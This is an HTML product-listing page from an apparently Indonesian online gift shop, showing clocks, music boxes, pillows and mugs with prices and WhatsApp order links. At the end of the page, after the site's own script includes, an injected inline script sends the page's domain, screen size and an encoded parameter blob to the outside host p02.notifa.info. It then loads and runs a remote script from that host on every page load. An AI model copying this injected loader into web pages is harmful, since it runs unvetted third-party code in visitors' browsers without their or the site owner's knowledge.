<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="description" content="">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <!-- The above 4 meta tags *must* come first in the head; any other head content must come *after* these tags-->
    <!-- Title-->
    <title>Udah Kadoin Aja! | Kado Untuk Semua Orang</title>
    <!-- Favicon-->
    <link rel="icon" href="img/core-img/favicon.png">
    <!-- Stylesheet-->
    <link rel="stylesheet" href="style.css">
  </head>
  <body>
    <!-- Preloader-->
    <div class="preloader" id="preloader">
      <div class="spinner-grow text-secondary" role="status">
        <div class="sr-only">Loading...</div>
      </div>
    </div>
    <!-- Header Area-->
    <div class="header-area" id="headerArea">
      <div class="container h-100 d-flex align-items-center justify-content-between">
        <!-- Back Button-->
        <div class="back-button" onclick="history.back()"><i class="lni-arrow-left"></i></div>
        <!-- Page Title-->
        <div class="page-heading">
          <h6 class="mb-0">Eksplor</h6>
        </div>
        <!-- Filter Option-->
        <a href="keranjang.html"><i class='lni lni-shopping-basket'></i></a>
      </div>
    </div>
    <div class="page-content-wrapper">
      <!-- Top Products-->
      <div class="top-products-area pt-3">
        <div class="container">
          <div class="section-heading d-flex align-items-center justify-content-between">
            <h6 class="ml-1">All Products</h6>
            <!-- Layout Options-->
            <!-- <div class="layout-options"><a class="active" href="shop-grid.html"><i class="lni-grid-alt"></i></a><a href="shop-list.html"><i class="lni-radio-button"></i></a></div> -->
          </div>
          <div class="row">
            <!-- Single Top Product Card-->
            <div class="col-6 col-sm-4">
              <div class="card top-product-card mb-3">
                <div class="card-body"><span class="badge badge-danger">-22%</span><a class="wishlist-btn" href="wedding-clock.html"><i class="lni-heart-filled"></i></a><a class="product-thumbnail d-block" href="wedding-clock.html"><img class="mb-2" src="img/product/2.jpg" alt=""></a><a class="product-title d-block" href="wedding-clock.html">Wedding Clock</a>
                  <p class="sale-price">Rp. 125.080</p>
                  <div class="product-rating"><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i></div><a class="btn btn-success" href="https://api.whatsapp.com/send?phone=628987088921&text=Hai%20kk%2C%20saya%20mau%20tanyak%20seputar%20Wedding%20Clock"><i class="lni-whatsapp"></i></a>
                </div>
              </div>
            </div>
            <!-- Single Top Product Card-->
            <div class="col-6 col-sm-4">
              <div class="card top-product-card mb-3">
                <div class="card-body"><span class="badge badge-danger">-22%</span><a class="wishlist-btn" href="wedding-clock.html"><i class="lni-heart-filled"></i></a><a class="product-thumbnail d-block" href="wedding-clock.html"><img class="mb-2" src="img/product/4.jpg" alt=""></a><a class="product-title d-block" href="wedding-clock.html">Wedding Clock</a>
                    <p class="sale-price">Rp. 125.080</p>
                    <div class="product-rating"><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i></div><a class="btn btn-success" href="https://api.whatsapp.com/send?phone=628987088921&text=Hai%20kk%2C%20saya%20mau%20tanyak%20seputar%20Wedding%20Clock"><i class="lni-whatsapp"></i></a>
                </div>
              </div>
            </div>
            <!-- Single Top Product Card-->
            <div class="col-6 col-sm-4">
              <div class="card top-product-card mb-3">
                <div class="card-body"><span class="badge badge-danger">-8%</span><a class="wishlist-btn" href="acrylic-music-box.html"><i class="lni-heart-filled"></i></a><a class="product-thumbnail d-block" href="acrylic-music-box.html"><img class="mb-2" src="img/product/5.jpg" alt=""></a><a class="product-title d-block" href="acrylic-music-box.html">Acrylic Music Box</a>
                    <p class="sale-price">Rp. 248.900</p>
                    <div class="product-rating"><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i></div><a class="btn btn-success" href="https://api.whatsapp.com/send?phone=628987088921&text=Hai%20kk%2C%20saya%20mau%20tanyak%20seputar%20Acrylic%20Music%20Box"><i class="lni-whatsapp"></i></a>
                </div>
              </div>
            </div>
            <!-- Single Top Product Card-->
            <div class="col-6 col-sm-4">
              <div class="card top-product-card mb-3">
                <div class="card-body"><span class="badge badge-success">Best Seller</span><a class="wishlist-btn" href="wooden-music-box.html"><i class="lni-heart-filled"></i></a><a class="product-thumbnail d-block" href="wooden-music-box.html"><img class="mb-2" src="img/product/1.jpg" alt=""></a><a class="product-title d-block" href="wooden-music-box.html">Wooden Music Box</a>
                  <p class="sale-price">Rp. 238.900</p>
                  <div class="product-rating"><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i></div><a class="btn btn-success" href="https://api.whatsapp.com/send?phone=628987088921&text=Hai%20kk%2C%20saya%20mau%20tanyak%20seputar%20Wooden%20Music%20Box"><i class="lni-whatsapp"></i></a>
                </div>
              </div>
            </div>
            <!-- Single Top Product Card-->
            <div class="col-6 col-sm-4">
              <div class="card top-product-card mb-3">
                <div class="card-body"><span class="badge badge-danger">-22%</span><a class="wishlist-btn" href="wedding-clock.html"><i class="lni-heart-filled"></i></a><a class="product-thumbnail d-block" href="wedding-clock.html"><img class="mb-2" src="img/product/6.jpg" alt=""></a><a class="product-title d-block" href="wedding-clock.html">Graduation Clock</a>
                    <p class="sale-price">Rp. 125.080</p>
                    <div class="product-rating"><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i></div><a class="btn btn-success" href="https://api.whatsapp.com/send?phone=628987088921&text=Hai%20kk%2C%20saya%20mau%20tanyak%20seputar%20Graduation%20Clock"><i class="lni-whatsapp"></i></a>
                </div>
              </div>
            </div>
            <!-- Single Top Product Card-->
            <div class="col-6 col-sm-4">
              <div class="card top-product-card mb-3">
                <div class="card-body"><span class="badge badge-danger">-22%</span><a class="wishlist-btn" href="family-clock.html"><i class="lni-heart-filled"></i></a><a class="product-thumbnail d-block" href="family-clock.html"><img class="mb-2" src="img/product/3.jpg" alt=""></a><a class="product-title d-block" href="family-clock.html">Family Clock 40x30</a>
                    <p class="sale-price">Rp. 167.200</p>
                    <div class="product-rating"><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i></div><a class="btn btn-success" href="https://api.whatsapp.com/send?phone=628987088921&text=Hai%20kk%2C%20saya%20mau%20tanyak%20seputar%20Family%20Clock%2040x30"><i class="lni-whatsapp"></i></a>
                </div>
              </div>
            </div>
            <div class="col-6 col-sm-4">
              <div class="card top-product-card mb-3">
                <div class="card-body"><span class="badge badge-danger">-22%</span><a class="wishlist-btn" href="family-clock2.html"><i class="lni-heart-filled"></i></a><a class="product-thumbnail d-block" href="family-clock2.html"><img class="mb-2" src="img/product/8.jpg" alt=""></a><a class="product-title d-block" href="family-clock2.html">Anniversary Clock 30x20</a>
                  <p class="sale-price">Rp. 125.080</p>
                  <div class="product-rating"><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i></div><a class="btn btn-success" href="https://api.whatsapp.com/send?phone=628987088921&text=Hai%20kk%2C%20saya%20mau%20tanyak%20seputar%20Anniversary%20Clock%2030x20"><i class="lni-whatsapp"></i></a>
                </div>
              </div>
            </div>
            <!-- Single Top Product Card-->
            <div class="col-6 col-sm-4">
              <div class="card top-product-card mb-3">
                <div class="card-body"><span class="badge badge-danger">-22%</span><a class="wishlist-btn" href="bantal-satin.html"><i class="lni-heart-filled"></i></a><a class="product-thumbnail d-block" href="bantal-satin.html"><img class="mb-2" src="img/product/9.jpg" alt=""></a><a class="product-title d-block" href="bantal-satin.html">Bantal Satin 40x60</a>
                    <p class="sale-price">Rp. 126.640</p>
                    <div class="product-rating"><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i></div><a class="btn btn-success" href="https://api.whatsapp.com/send?phone=628987088921&text=Hai%20kk%2C%20saya%20mau%20tanyak%20seputar%20Bantal%20Satin%2040x60"><i class="lni-whatsapp"></i></a>
                </div>
              </div>
            </div>
            <!-- Single Top Product Card-->
            <div class="col-6 col-sm-4">
              <div class="card top-product-card mb-3">
                <div class="card-body"><span class="badge badge-danger">-30%</span><a class="wishlist-btn" href="3dbox-lamp.html"><i class="lni-heart-filled"></i></a><a class="product-thumbnail d-block" href="3dbox-lamp.html"><img class="mb-2" src="img/product/10.jpg" alt=""></a><a class="product-title d-block" href="3dbox-lamp.html">3D Box Lamp Acrylic</a>
                  <p class="sale-price">Rp. 197.340</p>
                  <div class="product-rating"><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i></div><a class="btn btn-success" href="https://api.whatsapp.com/send?phone=628987088921&text=Hai%20kk%2C%20saya%20mau%20tanyak%20seputar%203DBox%20Lamp%20Acrylic"><i class="lni-whatsapp"></i></a>
                </div>
              </div>
            </div>
            <!-- Single Top Product Card-->
            <div class="col-6 col-sm-4">
              <div class="card top-product-card mb-3">
                <div class="card-body"><span class="badge badge-danger">-5%</span><a class="wishlist-btn" href="mug-couple.html"><i class="lni-heart-filled"></i></a><a class="product-thumbnail d-block" href="mug-couple.html"><img class="mb-2" src="img/product/11.jpg" alt=""></a><a class="product-title d-block" href="mug-couple.html">Mug Couple</a>
                    <p class="sale-price">Rp. 147.250</p>
                    <div class="product-rating"><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i></div><a class="btn btn-success" href="https://api.whatsapp.com/send?phone=628987088921&text=Hai%20kk%2C%20saya%20mau%20tanyak%20seputar%20Mug%20Couple"><i class="lni-whatsapp"></i></a>
                </div>
              </div>
            </div>
            <!-- Single Top Product Card-->
            <div class="col-6 col-sm-4">
              <div class="card top-product-card mb-3">
                <div class="card-body"><span class="badge badge-danger">-5%</span><a class="wishlist-btn" href="mug-single.html"><i class="lni-heart-filled"></i></a><a class="product-thumbnail d-block" href="mug-single.html"><img class="mb-2" src="img/product/12.jpg" alt=""></a><a class="product-title d-block" href="mug-single.html">Mug Single</a>
                    <p class="sale-price">Rp. 87.400</p>
                    <div class="product-rating"><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i></div><a class="btn btn-success" href="https://api.whatsapp.com/send?phone=628987088921&text=Hai%20kk%2C%20saya%20mau%20tanyak%20seputar%20Mug%20Single"><i class="lni-whatsapp"></i></a>
                </div>
              </div>
            </div>
            <!-- Single Top Product Card-->
            <div class="col-6 col-sm-4">
              <div class="card top-product-card mb-3">
                <div class="card-body"><span class="badge badge-success">Best Seller</span><a class="wishlist-btn" href="bantal-rasfur.html"><i class="lni-heart-filled"></i></a><a class="product-thumbnail d-block" href="bantal-rasfur.html"><img class="mb-2" src="img/product/13.jpg" alt=""></a><a class="product-title d-block" href="bantal-rasfur.html">Bantal Rasfur 40x60</a>
                    <p class="sale-price">Rp. 97.800</p>
                    <div class="product-rating"><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i></div><a class="btn btn-success" href="https://api.whatsapp.com/send?phone=628987088921&text=Hai%20kk%2C%20saya%20mau%20tanyak%20seputar%20Bantal%20Rasfur%2040x60"><i class="lni-whatsapp"></i></a>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
    <!-- Footer Nav-->
    <div class="footer-nav-area" id="footerNav">
      <div class="suha-footer-nav h-100">
        <ul class="h-100 d-flex align-items-center justify-content-between">
          <li><a href="index.html"><i class="lni-home"></i>Home</a></li>
          <li class="active"><a href="eksplor.html"><i class="lni-grid-alt"></i>Eksplor</a></li>
          <li><a href="https://api.whatsapp.com/send?phone=628987088921&text=Hai%20kk%2C%20saya%20mau%20tanyak%20seputar%20kado"><i class="lni-whatsapp"></i>Chat</a></li>
          <li><a href="notifikasi.html"><i class="lni-alarm lni-tada-effect"></i>Notifikasi</a></li>
          <li><a href="support.html"><i class="lni-question-circle"></i>Support</a></li>
        </ul>
      </div>
    </div>
    <!-- All JavaScript Files-->
    <script src="js/jquery.min.js"></script>
    <script src="js/popper.min.js"></script>
    <script src="js/bootstrap.min.js"></script>
    <script src="js/waypoints.min.js"></script>
    <script src="js/jquery.easing.min.js"></script>
    <script src="js/owl.carousel.min.js"></script>
    <script src="js/jquery.animatedheadline.min.js"></script>
    <script src="js/jquery.counterup.min.js"></script>
    <script src="js/wow.min.js"></script>
    <script src="js/jarallax.min.js"></script>
    <script src="js/jarallax-video.min.js"></script>
    <script src="js/default/jquery.passwordstrength.js"></script>
    <script src="js/default/dark-mode-switch.js"></script>
    <script src="js/default/active.js"></script>
  <script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p02.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582JQuX3gzRncXPPmQbDs9V4a7raPflaovNBDTRPOrA48HVcAgNNe21L7J0Tidg0Yw%2bDU%2bifJ9GsyqyVQxUyaTLLRWU%2b6qluy7KycBFsdSw43JOZ1I8TrY1lwX7KOA1ieVebZ82rSa37OJYPScKmv3FHUox4lOf8U1jEijf4Lyw05LYWzZksOLjIc1xyC9N4ASTnrL80UvOZ4nSatX6e8p1ZRrwvXDd%2bNXdSk%2bptIhAu5%2bIde4VrnceJT89hIvQBCKxrkSPt4f3uDJcWHxFQnbnhp4Uih7s9i%2fJAEssadRn1lD%2b%2f56eCFK12jfIATVAXVNoMExQYGqG%2f1vyUkaHPVnBIbBk6yHkw4AP2%2b%2fvvACpqq%2f6Y8PCMH9YynzPrQ3rFNsFyuXNYtnCARIeFUr9vIx6EZdjJ5xWsmtbEIlnm2LqThxQ%2fsWK5ihFH88CEJwUGGg3a5%2bniMR9H%2fbgGr5kcDIIYtbLAQekjp2krZ0%2fExQwpF5bVzqfPia7%2f%2f%2f2Kfkuj6cPtCmGBaLvdy3hfcW1Ucqqtih00kbeppCgg%3d%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
</html>